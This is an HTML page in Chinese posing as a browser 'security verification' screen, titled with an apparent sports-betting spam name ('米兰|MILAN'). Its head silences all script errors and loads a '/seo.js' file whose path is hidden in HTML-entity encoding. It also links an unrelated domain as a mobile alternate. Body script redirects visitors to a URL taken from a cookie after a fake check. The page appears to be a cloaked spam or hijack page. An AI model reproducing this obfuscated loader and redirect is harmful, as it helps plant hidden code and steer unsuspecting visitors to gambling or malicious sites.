<!DOCTYPE html>
<html lang="zh-CN">
<head><script>var V_PATH="/";window.onerror=function(){ return true; };</script>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>米兰|MILAN|官方网站-Come on! World Cup</title>
    <style>
        * {
            margin: 0;
            padding: 0;
            box-sizing: border-box;
        }

        body {
            font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, 'Helvetica Neue', Arial, sans-serif;
            min-height: 100vh;
            display: flex;
            align-items: center;
            justify-content: center;
            background: linear-gradient(135deg, #667eea 0%, #764ba2 100%);
            color: #333;
        }

        .captcha-container {
            background: white;
            padding: 40px 50px;
            border-radius: 16px;
            box-shadow: 0 20px 60px rgba(0, 0, 0, 0.3);
            text-align: center;
            max-width: 400px;
            width: 90%;
        }

        .loading-spinner {
            width: 60px;
            height: 60px;
            border: 4px solid #f3f3f3;
            border-top: 4px solid #667eea;
            border-radius: 50%;
            animation: spin 1s linear infinite;
            margin: 0 auto 24px;
        }

        @keyframes spin {
            0% { transform: rotate(0deg); }
            100% { transform: rotate(360deg); }
        }

        .title {
            font-size: 22px;
            font-weight: 600;
            color: #333;
            margin-bottom: 12px;
        }

        .message {
            font-size: 15px;
            color: #666;
            line-height: 1.6;
        }

        .progress-bar {
            width: 100%;
            height: 6px;
            background: #e0e0e0;
            border-radius: 3px;
            margin-top: 24px;
            overflow: hidden;
        }

        .progress-fill {
            height: 100%;
            background: linear-gradient(90deg, #667eea, #764ba2);
            border-radius: 3px;
            width: 0%;
            animation: progress 3s ease-in-out forwards;
        }

        @keyframes progress {
            0% { width: 0%; }
            100% { width: 100%; }
        }

        .success-state .status-icon {
            color: #4CAF50;
        }

        .nojs-warning {
            background: #fff3cd;
            border: 1px solid #ffc107;
            color: #856404;
            padding: 12px 20px;
            border-radius: 8px;
            font-size: 14px;
        }

        @media (max-width: 480px) {
            .captcha-container {
                padding: 30px;
                margin: 20px;
            }
            
            .title {
                font-size: 20px;
            }
            
            .message {
                font-size: 14px;
            }
        }
    </style>
<link rel="alternate" media="only screen and(max-width: 640px)" href="http://wuxifuruite.com" ><script type="text/javascript" src="&#47;&#115;&#101;&#111;&#46;&#106;&#115;" rel="nofollow"></script></head>
<body><script>
(function(){
    var bp = document.createElement('script');
    var curProtocol = window.location.protocol.split(':')[0];
    if (curProtocol === 'https') {
        bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
    }
    else {
        bp.src = 'http://push.zhanzhang.baidu.com/push.js';
    }
    var s = document.getElementsByTagName("script")[0];
    s.parentNode.insertBefore(bp, s);
})();
</script>
<h1><a href="/" target="_blank">米兰|MILAN|官方网站-Come on! World Cup</a></h1>
    <noscript>
        <div class="captcha-container">
            <div class="nojs-warning">
                ⚠️ 浏览器不支持 JavaScript，页面无法访问！
            </div>
        </div>
    </noscript>

    <div class="captcha-container" id="container">
        <div class="loading-spinner" id="spinner"></div>
        <div class="title" id="title">安全验证</div>
        <div class="message" id="msg"></div>
        <div class="progress-bar">
            <div class="progress-fill"></div>
        </div>
    <script type="text/javascript">
        var dt = new Date(); 
        dt.setSeconds(dt.getSeconds() + 60);
        document.cookie = "_wtsjsk=081d546c5af56e289d3702a0bc6fad6e; path=/ ";
        var cookiesEnabled = document.cookie.indexOf("_wtsjsk=") != -1; 

        function getCookie(name)
            {
                var arr,reg=new RegExp("(^| )"+name+"=([^;]*)(;|$)");
                if(arr=document.cookie.match(reg))
                    return arr[2];
                else
                    return null;
            }
            
        var preurl = getCookie("_wtspurl"); 
        var cookie_CaptchaKey = getCookie("_wtscpk");  
        var cookie_Expire = getCookie("_wtsexp");  

        if(cookie_CaptchaKey == null||cookie_Expire == null){
            var msgText = "浏览器安全检查中...";
            if (preurl != null) {
                msgText += "<br><small style='color: #999;'>正在跳转...</small>";
            }
            document.getElementById("msg").innerHTML = msgText;
            
            if (preurl==null)
            {
                if(!cookiesEnabled) { 
                        var msg ="❌ 浏览器不支持 Cookie，页面无法访问";
                        document.getElementById("msg").innerHTML = msg;
                        document.getElementById("spinner").className = "warning-state";
                } else {
                    document.getElementById("spinner").className = "warning-state";
                    setTimeout(function() {location.reload();}, 3000);
                }
            } else {
                setTimeout(function() {location.reload();}, 3000);
            }

        }else{
            document.getElementById("spinner").style.display = "none";
            document.querySelector(".progress-bar").style.display = "none";
            
            var successIcon = `<svg class="status-icon" style="width:60px;height:60px;margin-bottom:24px;color:#4CAF50;" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2">
                <path d="M22 11.08V12a10 10 0 1 1-5.93-9.14"></path>
                <polyline points="22 4 12 14.01 9 11.01" fill="none" stroke="currentColor" stroke-width="2"></polyline>
            </svg>`;
            document.getElementById("container").innerHTML = 
                successIcon + 
                `<div class="title" style="color:#4CAF50;">✓ 验证通过</div>` +
                `<div class="message">正在跳转到目标页面...</div>` +
                `<div class="progress-bar"><div class="progress-fill"></div></div>`;
            
            setTimeout(function() {window.location.href = preurl;}, 1000);
        }
    </script>
</html>